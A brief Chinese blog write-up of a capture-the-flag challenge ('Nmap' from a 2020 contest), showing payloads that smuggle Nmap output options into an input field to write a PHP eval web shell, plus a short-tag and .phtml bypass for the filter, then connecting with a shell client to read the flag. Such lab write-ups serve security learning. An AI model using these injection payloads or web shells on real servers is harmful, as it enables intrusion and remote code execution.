[网鼎杯 2020 朱雀组]Nmap

 

[BUUCTF 2018]Online Tool类似,直接用里面的payload

' <?php @eval($_POST["hack"]);?> -oG hack.php '

回显hacker,经查,php被过滤,使用短标签绕过

' <?= @eval($_POST["hack"]);?> -oG hack.phtml '

成功写入

访问一下

http://b829d549-378b-494f-87e4-a74d13e0c223.node3.buuoj.cn/hack.phtml

 

蚁剑连接一波,在根目录下找到flag

posted @ 2020-05-29 18:34  山野村夫z1  阅读(2328)  评论(0)    收藏  举报